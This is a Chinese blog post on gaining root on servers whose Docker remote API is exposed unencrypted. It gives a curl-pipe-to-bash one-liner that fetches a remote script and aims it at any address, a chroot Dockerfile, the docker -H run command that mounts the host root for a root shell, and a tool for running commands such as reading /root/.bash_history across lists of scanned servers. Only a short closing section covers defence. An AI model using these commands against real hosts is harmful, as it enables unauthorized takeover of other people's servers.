一个回车键黑掉一台服务器——使用Docker时不要这么懒啊喂

不说废话真的一个回车键:

curl -sSL https://git.io/vXNB4 | bash -s test <addr:port>

自己替换<addr:port>的内容,下面是原理与批量扫描测试。


首先我不是什么黑客,也不是什么白帽子,我甚至从未踏进那个圈子,但是前几天闲来无事扫了一下网络上开放的Docker API端口,发现互联网上存在着大量未使用加密传输、直接开放Docker远程API端口的服务器,这些端口允许任何人连接到服务器并使用Docker。

而众所周知,docker这个用户组拥有与root用户基本一样的权限,这意味着我们可以通过这些端口获取服务器的最高权限。

本文代码:https://github.com/izuolan/docker-root-shell
如果你用这个玩意拿到了最高权限也别乱动别人服务器啦~~心疼运维一秒钟~~

一、原理演示

本节是在本地做的一个演示,我才不搞事,笑。先安装Docker,没什么好说的。

1.开启socket

为了更好地演示Docker远程API,我们首先要设置一下本地的Docker daemon启动参数,使其开启socket端口用于返回信息。

根据不同的发行版(这里以Linux为例),开启socket的方式也有不同。

简单来说,使用service命令管理服务的发行版(例如Ubuntu 14.04)可以直接通过修改/etc/default/docker这个文件就可以开启socket:

# Docker Upstart and SysVinit configuration file
#
# THIS FILE DOES NOT APPLY TO SYSTEMD
#
#   Please see the documentation for "systemd drop-ins":
#   https://docs.docker.com/engine/articles/systemd/
#
# Customize location of Docker binary (especially for development testing).
#DOCKERD="/usr/local/bin/dockerd"
# Use DOCKER_OPTS to modify the daemon startup options.
#DOCKER_OPTS="--dns 8.8.8.8 --dns 8.8.4.4"
# 修改下面
DOCKER_OPTS="-H tcp://0.0.0.0:2333 -H unix:///var/run/docker.sock"
# If you need Docker to use an HTTP proxy, it can also be specified here.
#export http_proxy="http://127.0.0.1:3128/"
# This is also a handy place to tweak where Docker's temporary files go.
#export TMPDIR="/mnt/bigdrive/docker-tmp"

然后保存重启Docker:

$ service docker restart

现在你可以使用curl等工具访问本地Docker daemon了。
至于使用systemd管理系统服务的发行版版(例如Ubuntu 16.04),需要在/etc/systemd/system/文件夹中操作,具体如下:
创建文件夹:

$ sudo mkdir /etc/systemd/system/docker.service.d/

新建配置文件,内容如下:

$ sudo vim /etc/systemd/system/docker.service.d/remote-api.conf
[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2333 -H unix:///var/run/docker.sock

注意,ExecStart要输入两次。保存然后重新加载systemd配置并重启Docker:

$ systemctl daemon-reload
$ systemctl restart docker

现在任何人都可以通过docker -H "tcp://<我电脑IP>:<2333>"来执行操作控制我电脑上的Docker,例如docker -H "tcp://<我电脑IP>:<2333>" images查看我电脑上的全部镜像。

2.构建入侵镜像

现在任何人都可以连接到我电脑上的Docker API接口并操作我电脑上的Docker,但是为了获取电脑的Root权限我们还需要一个特殊的镜像,通过这个镜像获取系统最高权限。
镜像Dockerfile非常简单:

FROM busybox
CMD ["chroot","/host_dir","/bin/sh"]

纳尼?就两句话?嗯,准确来说就一句话,通过chroot切换为root的执行环境,chroot这个工具的作用就是Change Root,也就是改变程序执行时所参考的根目录位置。
使用

docker build -t anony/mous .

这样就获得了一个入侵镜像。才几百KB的镜像远程传输起来非常方便。

3.获取系统最高权限

现在到了最后一步,没有什么复杂的操作,我们要的只是运行容器:

docker -H tcp://<被入侵IP>:<API的端口> \
    run -v /:/host_dir \
    --name anonymous \
    --rm -it anony/mous

这个命令大概都能看懂吧,就是把被入侵的主机的根目录/挂载到容器的host_dir目录,然后容器启动时执行chroot /host_dir /bin/sh
这样就获得了被入侵机器的最高权限。现在执行任何操作都是与主机root用户执行的一样。已经没有什么可以阻挡你了。

二、批量测试

原理解释完,我们来看如何批量测试互联网空间上这些未加密的服务器。周末花了点时间写了个脚本,用于测试批量服务器。

1.一个回车键的事

还记得标题说的一个回车键黑掉一台服务器吗?就是下面这句话了,一个回车键你就可以获得对应服务器的最高权限。

curl -sSL https://git.io/vXNB4 | bash -s test <addr:port>

2.批量测试管理

好吧,脚本写着写着就歪楼了,本来是批量测试的脚本变成了集测试、管理于一体的脚本。目前已经集成了如下功能:

  • 快速连接一台服务器
  • 对一台或批量服务器执行命令
  • 添加服务器到列表
  • 从列表删除服务器
  • 测试一台或批量服务器的延迟
  • 测试服务器是否开放了Docker Remote API端口
  • 远程执行Docker命令
Docker Root Shell

1.直接执行该脚本可以查看服务器列表

$ ./docker-root-shell.sh
==========================================================================
  Num   - Alias - Address Port          - CPU Mem       -  Note
==========================================================================
  1     - wo    - 172.16.8.247 2376     - 8 Cu 8 GB     -  Work
  2     - ol    - 172.16.158.90 2376    - 8 Cu 8 GB     -  Online
  ... ...

2.连接到服务器

# 使用别名快速连接到一台服务器
$ ./docker-root-shell.sh con wo

3.对一台或批量服务器执行命令

# 对一台服务器执行命令,指定别名
$ ./docker-root-shell.sh run wo "cat /root/.bash_history"
# 对批量服务器执行命令,使用all
$ ./docker-root-shell.sh run all "cat /etc/hosts"

4.添加一台服务器到列表中

# 别名:地址:端口:CPU:内存:备注
# <>表示必填,[]表示选填,别名不能是纯数字
./docker-root-shell.sh add <alias>:<addr>:<port>:[cpu]:[ram]:[note]
./docker-root-shell.sh add wo2:172.16.168.233:6666

5.从列表中删除一台服务器

./docker-root-shell.sh del <alias>
./docker-root-shell.sh del wo2

6.测试服务器延迟

# 测试全部服务器的延迟
# 输入一个数字,表示每台服务器的发包数量,会输出平均延迟
./docker-root-shell.sh ping <count>
./docker-root-shell.sh ping 1
# 测试一台服务器的延迟只需要指定别名即可
./docker-root-shell.sh ping <alias>
./docker-root-shell.sh ping wo2

7.使用Docker Client远程操作Docker

# 没什么好说的,指定别名,该干嘛干嘛
./docker-root-shell.sh docker <alias> <docker subcommand>
./docker-root-shell.sh docker wo2 images

8.编辑服务器列表

# 需要调整一下就使用这玩意吧,默认编辑器在脚本头部可以设定。
./docker-root-shell.sh edit

三、如何防御

最简单的,如果你需要用第三方工具使用Docker API,但是不需要远程控制,把tcp端口绑定在127.0.0.1就好啦,例如-H "tcp://127.0.0.1:2333",但是如果你要远程使用Docker API,那么还是老实加密吧。

如何加密传输?官方文档很清楚写着了啊~~
https://docs.docker.com/engine/security/https/

总而言之,这种人为漏洞就尽可能避免啦,别偷懒,乖乖♂使用加密。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,864评论 6 494
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,175评论 3 387
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,401评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,170评论 1 286
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,276评论 6 385
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,364评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,401评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,179评论 0 269
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,604评论 1 306
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,902评论 2 328
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,070评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,751评论 4 337
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,380评论 3 319
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,077评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,312评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,924评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,957评论 2 351

推荐阅读更多精彩内容

  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,644评论 18 139
  • Docker — 云时代的程序分发方式 要说最近一年云计算业界有什么大事件?Google Compute Engi...
    ahohoho阅读 15,519评论 15 147
  • 转载自 http://blog.opskumu.com/docker.html 一、Docker 简介 Docke...
    极客圈阅读 10,487评论 0 120
  • 一、Docker 简介 Docker 两个主要部件:Docker: 开源的容器虚拟化平台Docker Hub: 用...
    R_X阅读 4,383评论 0 27